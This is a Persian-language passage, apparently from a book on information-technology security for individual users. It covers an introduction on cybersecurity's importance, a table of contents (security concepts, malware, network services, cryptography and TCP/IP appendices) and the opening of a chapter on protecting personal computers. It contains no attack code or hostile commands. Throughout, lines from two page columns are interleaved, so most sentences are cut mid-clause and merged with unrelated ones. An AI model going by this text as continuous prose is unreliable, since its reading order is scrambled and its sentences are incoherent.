‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪ ﻭ ﻣﻬﻴﺠﻲ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨـﺪ‬


‫ﺧﺎﺹ ﺷﻤﺎ ﻣﺮﺑﻮﻁ ﻫﺴﺘﻨﺪ ﻛﻤﻚ ﻣﻲ ﻛﻨﻨﺪ‪ .‬ﻋﻼﻭﻩ ﺑﺮ ﺁﻥ ﻣﺮﺍﺟﻊ‬
‫ﻛﻪ ﻫﺮﻳﻚ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺭ ﺁﻣﻮﺯﺵ‪ ،‬ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺭﻓـﺎﻩ‪،‬‬
‫ﭼﺎﭘﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻓﺮﺍﻭﺍﻧﻲ ﻛﻪ ﺩﺭ ﺑﺮ ﺩﺍﺭﻧﺪﻩ ﺍﺑﻌﺎﺩ ﺧﺎﺹ ﺍﻣﻨﻴﺖ‬
‫ﺗﺠﺎﺭﺕ ﻭ ﺳﺎﻳﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﺔ ﻣﺪﻧﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻫﺴﺘﻨﺪ ﻭ ﻫﻤﭽﻨﻴﻦ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺑﻪ ﺷـﻜﻞ‬
‫ﺗﺨﺼﺼﻲ ﺑﺮ ﺭﻭﻱ ﻣﻮﺿﻮﻋﺎﺕ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺗﻤﺮﻛـﺰ‬ ‫ﺗﻤﺎﻡ ﺍﻓﺮﺍﺩ ﻭ ﻛﺸﻮﺭﻫﺎ ﺍﺯ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻬﺮﻩ ﻣﻲﺟﻮﻳﻨـﺪ‪ ،‬ﺍﻣـﺎ‬
‫ﺩﺍﺭﻧﺪ ﺭﺍ ﻣﻌﺮﻓـﻲ ﻣـﻲﻛﻨـﺪ‪ .‬ﺗﻤـﺎﻣﻲ ﺍﻳـﻦ ﻣﻨـﺎﺑﻊ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩ ﻭ‬ ‫ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﺑﺮﺍﻱ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺟﺎﺫﺑﺔ ﺧﺎﺻﻲ ﺩﺍﺭﺩ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﭘﻲ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺧﻮﺩ ﺍﺯ ﺍﻣﻨﻴﺖ ﺩﺭ ﺟﻬﺎﻥ‬ ‫ﻭ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺁﻧﻬﺎ ﺩﺭ ﺟﺎﻣﻌﺔ ﺍﻗﺘـﺼﺎ ‪‬ﺩ ﺟﻬـﺎﻧﻲ ﺭﺍ ﺗـﺴﺮﻳﻊ‬
‫ﺷﺒﻜﻪﺍﻱ ﻣﻲﺑﺎﺷﻨﺪ ﻣﻔﻴﺪ ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬ ‫ﻛﻨﺪ‪ .‬ﺍﻳﻦ ﻓﻨﺎﻭﺭﻱ ﻫﻨﻮﺯ ﺩﺭ ﺁﻏﺎﺯ ﺭﺍﻩ ﺧـﻮﺩ ﺍﺳـﺖ ﻭﻟـﻲ ﺑـﺴﺮﻋﺖ‬
‫ﺩﺭﺣﺎﻝ ﭘﻴﺸﺮﻓﺖ ﻣﻲ ﺑﺎﺷﺪ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﻫﻤﺎﻧﻨﺪ ﺳـﺎﻳﺮ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ‬
‫ﺍﻳﻦ ﺷﺮﺍﻳﻂ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺯ ﺍﻫﻤﻴـﺖ ﺧﺎﺻـﻲ‬
‫ﻓﻨﺎﻭﺭﻱ‪ ،‬ﺍﻳﻨﺘﺮﻧﺖ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻫﻢ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻣـﺸﺮﻭﻉ ﻭ ﻫـﻢ‬
‫ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ‪ .‬ﺳﺮﻣﺎﻳﻪ ﮔـﺬﺍﺭﻱ ﻣـﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻋﺘﻤـﺎﺩ ﻭ‬
‫ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻧﺎﻣﺸﺮﻭﻉ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴـﺮﺩ‪ .‬ﻫﻤـﺎﻧﻄﻮﺭ ﻛـﻪ‬
‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﺩﺭ ﺍﻳﻦ ﻛﺸﻮﺭﻫﺎ ﺑـﺴﺘﮕﻲ ﺑـﻪ ﺳـﻄﺢ ﺍﻣﻨﻴـﺖ ﻭ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺩﺭ ﺩﻧﻴﺎﻱ ﺳﺎﻳﺒﺮ ﻣﺠﺮﻣﺎﻥ ﻭ ﺧﺮﺍﺑﻜـﺎﺭﺍﻧﻲ ﻭﺟـﻮﺩ‬
‫ﭘﻴﺎﺩﻩﺳـﺎﺯﻱ ﻣﻮﻓﻘﻴـﺖﺁﻣﻴـﺰ ﻓﻨـﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳـﺎﺧﺘﻬﺎﻱ ﺁﻥ ﺩﺍﺭﺩ‪.‬‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ ﺣﻤﻠﻪ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻲ‬
‫ﺩﻭﻟﺘﻬﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﻫﻤﮕـﻲ ﻧﻘـﺶ ﺑـﺴﺰﺍﻳﻲ ﺩﺭ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﺳﺮﻣﺎﻳﻪ ﻫﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﻛـﺸﻮﺭﻫﺎ‬
‫ﺍﻳﻔﺎ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﻨﺎﺧﺖ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺴﻴﺎﺭ ﺳﻮﺩﻣﻨﺪ ﺍﺳﺖ؛ ﻭ ﻋﻤﻠﻜﺮﺩ‬ ‫ﻣﻔﻬﻮﻡ "ﺍﻳﻤﻨﻲ ﺳﺎﻳﺒﺮ" ﻳﻚ ﻣﻔﻬﻮﻡ ﻣﻬـﻢ ﺍﺳـﺖ‪ .‬ﻣﺜﺎﻟﻬـﺎﻱ ﺍﻳـﻦ‬
‫ﻣﻨﺎﺳﺐ ﺑﺮ ﺍﺳﺎﺱ ﭼﻨﻴﻦ ﺷﻨﺎﺧﺘﻲ ﻣﻲﺗﻮﺍﻧـﺪ ﻳـﻚ ﻣﺤـﻴﻂ ﻗﺎﺑـﻞ‬ ‫ﻓﺼﻞ‪ ،‬ﻣﻴﺰﺍﻥ ﻭﻗﺎﻳﻊ ﮔـﺰﺍﺭﺵﺷـﺪﻩ ﺑـﻪ ‪ ،CERT‬ﻭ ﺭﺧـﺪﺍﺩﻫﺎﻱ‬
‫ﺍﻃﻤﻴﻨﺎﻥ ﺍﻳﺠﺎﺩ ﻛﻨﺪ ﻭ ﺑﺎﻋﺚ ﺷﻮﺩ ﺳﺎﻛﻨﺎﻥ ﻛﺮﺓ ﺯﻣﻴﻦ ﺗـﺎ ﺳـﺮﺣﺪ‬ ‫ﺟﺪﻳﺪﻱ ﻛﻪ ﺭﻭﺯﺍﻧﻪ ﺩﺭ ﻣﻄﺒﻮﻋـﺎﺕ ﮔـﺰﺍﺭﺵ ﻣـﻲﺷـﻮﻧﺪ ﻫﻤﮕـﻲ‬
‫ﺍﻣﻜﺎﻥ ﻓﻮﺍﻳﺪ ﻋﺼﺮ ﻧﻮﻳﻦ ﺩﻳﺠﻴﺘﺎﻝ ﺭﺍ ﺣﺲ ﻛﻨﻨﺪ‪.‬‬ ‫ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻛـﻪ ﭼـﺮﺍ ﺁﮔـﺎﻫﻲ ﺍﺯ ﻣﻮﺿـﻮﻋﺎﺕ ﺍﻣﻨﻴﺘـﻲ ﺣـﺎﺋﺰ‬
‫ﺍﻫﻤﻴﺖ ﺍﺳﺖ ﻭ ﭼﺮﺍ ﺑﺎﻳﺪ ﮔﺎﻣﻬﺎﻳﻲ ﺑـﺮﺍﻱ ﺗـﻀﻤﻴﻦ ﭘـﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ‪ ،‬ﺩﺍﺩﻩﻫﺎ ﻭ ﺗﺠﺎﺭﺕ ﺑﺮﺩﺍﺷﺖ‪.‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﻭ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﻓﺼﻞ ‪ .۱‬ﻣﻘﺪﻣﻪ‬
‫ﻓﺼﻞ ‪ .۲‬ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﱵ‬
‫ﻓﺼﻞ ‪ .۳‬ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ‬
‫ﻓﺼﻞ ‪ .۴‬ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﻓﺼﻞ ‪ .۵‬ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﳐﺮﺏ‬
‫ﻓﺼﻞ ‪ .۶‬ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ‬
‫ﻓﺼﻞ ‪ .۷‬ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬
‫ﻓﺼﻞ ‪ .۸‬ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ‬
‫ﺿﻤﻴﻤﻪ‪ .۱‬ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ‬
‫‪TCP/IP‬‬ ‫ﺿﻤﻴﻤﻪ‪.۲‬‬
‫ﺿﻤﻴﻤﻪ‪ .۳‬ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ﻓﲏ‬
‫ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻳــﺎ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻭﺑــﻲ ﻛــﻪ ﺑــﻪ ﺁﻧﻬــﺎ‬ ‫•‬
‫ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻳﺪ ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﺳـﺮﻗﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ‪ ١‬ﻭ‬
‫ﺭﻣﺰ ﻋﺒﻮﺭ‪ ٢‬ﻧﻴﺴﺖ؛‬
‫ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ‬ ‫•‬
‫ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺍﺭﺩ‬ ‫ﻓﺼﻞ ﺍﻭﻝ‬
‫ﻛﻨﻴــﺪ‪ ،‬ﺩﺍﺩﻩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺍﺯ ﺍﻣﻨﻴــﺖ ﻛﺎﻣــﻞ ﺑﺮﺧــﻮﺭﺩﺍﺭ‬ ‫ﻣﻘﺪﻣﻪ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ )ﻣﺴﻠﻤﹰﺎ ﺷﻤﺎ ﺑﺮ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳـﻮﻱ ﺩﻳﮕـﺮ ﺷـﺒﻜﺔ‬
‫ﺍﺭﺗﺒﺎﻃﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻟﻲ ﻧﺨﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ(؛‬ ‫ﺗﺄﻛﻴﺪ ﺑﺨﺶ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﺭﺍﻳﺎﻧـﻪ‬
‫ﺍﺳﺖ ‪ -‬ﺍﺯ ﻣﺒﺘﺪﻳﺎﻥ ﮔﺮﻓﺘﻪ ﺗﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ؛ ﻭ ﺍﻭﻟﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻛﻪ‬
‫ﻭ ‪...‬‬ ‫•‬
‫ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺑﺎﻳــﺪ ﺷــﺮﺡ ﺩﺍﺩﻩ ﺷــﻮﺩ ﭼﮕــﻮﻧﮕﻲ ﺣﻔﺎﻇــﺖ ﺍﺯ‬
‫ﭼﻨﺎﻧﭽﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ‬ ‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺳﺖ‪.‬‬
‫ﺷﻮﻧﺪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﺑﺎﺭ ﻣـﻲﺁﻳـﺪ‪ :‬ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ؛ ﻭﻟـﻲ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ‬
‫ﭘﻴﺎﻣﺪﻫﺎ ﻣﻨﺠﺮ ﺑـﻪ ﺁﺯﺍﺭ ﺷـﺨﺺ ﮔﺮﺩﻧـﺪ ﻭﻟـﻲ ﻫﺰﻳﻨـﻪﺍﻱ ﺩﺭ ﺑـﺮ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺯﻳﺮﻛﻲ ﻭ ﻣﺮﺍﻗﺒﺖ ﺷﺪﻳﺪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺯﺑﺎﻥ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ‬
‫ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺗﺤﻤﻴـﻞ ﻛﻨﻨـﺪ ﻭ ﻭﻗـﺖ‬
‫ﺍﻳﻦ ﺑﺤﺚ ﺑﻌﻀﹰﺎ ﺣﺎﻭﻱ ﻣﻔﺎﻫﻴﻢ ﻧﺎﻣﺄﻧﻮﺳﻲ ﻣـﻲﺑﺎﺷـﺪ‪ .‬ﺑﻌـﻀﻲ ﺍﺯ‬
‫ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﻫﻨـﺪ‪ .‬ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ‬
‫ﺍﺻﻄﻼﺣﺎﺕ ﻭ ﺗﻌﺎﺭﻳﻒ ﺩﺭ ﺿﻤﻴﻤﺔ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ﺁﻣﺪﻩﺍﻧـﺪ ﻭ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻓﺔ ﺷﺨﺺ ﻗﻠﻤﺪﺍﺩ ﻣﻲﺷـﻮﺩ ﻣﻤﻜـﻦ‬
‫ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺩﺭ ﭘﻴﻮﺳﺖ ‪ ۱‬ﻛﺘﺎﺏ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻃﺮﺡ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺍﺳﺖ ﻣﺸﻜﻞ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺑﻪ ﺧﻄﺮ ﺍﻓﺘﺎﺩﻥ ﻣﻮﻗﻌﻴﺖ ﺷﻐﻠﻲ‬
‫ﻭﻱ ﮔﺮﺩﺩ‪ .‬ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺣﺘﻤـﺎﻝ‬ ‫ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﺭﺍﺋﻪ ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ‬
‫ﺧﻄﺮ ﺑﭙﺮﺩﺍﺯﺩ ﻭ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺭﺍ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﻭ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ‬ ‫ﻣﻔﻬﻮﻡ "ﻛﺎﺭﺑﺮﺩ ﺻﺤﻴﺢ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ "ﺣﻔﺎﻇﺖ" ﺍﺯ ﺁﻧﻬـﺎ‬
‫ﻧﻤﺎﻳﺪ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺟﺰﺋﻴـﺎﺗﻲ ﻛـﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ‬ ‫ﻣﺸﺨﺺ ﺷﻮﺩ‪ .‬ﺍﮔﺮ ﺷـﻤﺎ ﻧﻴـﺰ ﺑـﺪﻧﺒﺎﻝ ﻫﻤـﻴﻦ ﻣـﺴﺌﻠﻪ ﻫـﺴﺘﻴﺪ‪،‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺑﺘـﻮﺍﻥ‬ ‫ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ‪:‬‬
‫ﺗﻤﺎﻣﻲ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩ‪.‬‬ ‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻳـﺎ‬ ‫•‬

‫ﭼﻨﺎﻧﭽﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻴـﺰ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ‬ ‫ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﭼﻨﻴﻦ ﺧﻮﺍﺳﺘﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛‬
‫ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﻭ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺁﻧﺮﺍ‬ ‫•‬
‫ﺍﺯ ﺟﻬﺎﻥ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﻧﻤﻮﺩ‪.‬‬ ‫ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ )ﻣﮕﺮ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ‪،‬‬

‫ﻃﺒﻴﻌﺘﹰﺎ ﺍﺭﺍﺋﻪ ﺗﻤﺎﻣﻲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﺻـﺪﻫﺎ‬ ‫ﻛﻪ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺳﺖ(؛‬
‫ﺻﻔﺤﻪ ﻣﻄﻠﺐ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ‪ ،‬ﺍﻣﺎ ﻣﺨﺎﻃﺒﻴﻦ ﻏﺎﻟﺒﹰﺎ‬ ‫ﻫﻴﭽﻜﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎ‪ ،‬ﺭﺍﻳﺎﻧـﻪ ﻭ‬ ‫•‬
‫ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻣﻄﺎﻟﻌﻪ ﻣﻄﺎﻟﺐ ﺍﻧﺒﻮﻩ ﻧﺪﺍﺭﻧـﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻧﻮﺷـﺘﻪ‬ ‫ﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ؛‬
‫ﺧﻼﺻــﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﺟﻬــﺖ ﺩﺭﻙ ﻭ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺭﺍ‬ ‫•‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳـﺖ‪.‬‬
‫ﻣﻨﺘﺸﺮ ﻧﻤﻲﻛﻨﺪ؛‬
‫ﻣﺮﺍﺟﻊ ﺫﻛﺮﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﻳﻢ ﺷـﺎﻣﻞ ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‪،‬‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ‪ ،‬ﻭ ﻣﺴﺘﻨﺪﺍﺕ ﭼﺎﭘﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛﻤﻜﻬـﺎﻱ‬ ‫ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺍﻳﺠـﺎﺩ‬ ‫•‬
‫ﻣﻔﻴﺪﻱ ﺑﺎﺷﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻣﻄﺎﻟﻌﺔ ﺑﻴﺸﺘﺮ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻱ‬ ‫ﻣﻲﻛﻨﻴﺪ ﻧﻴﺴﺖ؛‬
‫ﺍﻃﻼﻋﺎﺕ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﻛــﺴﻲ ﺗﻮﺍﻧــﺎﻳﻲ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺷــﻤﺎ‪ ،‬ﭼــﻪ ﺩﺭ‬ ‫•‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ﭼﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﻧﺪﺍﺭﺩ؛‬

‫‪1‬‬ ‫‪Username‬‬
‫‪2‬‬ ‫‪Password‬‬
‫‪٤٩‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﺗﺠـﺎﺭﻱ ﺑﺎﺷـﻨﺪ ﻛـﻪ ﺗﻮﺳـﻂ ﻛـﺎﺭﺑﺮ ﻧﻮﺷـﺘﻪ‬


‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
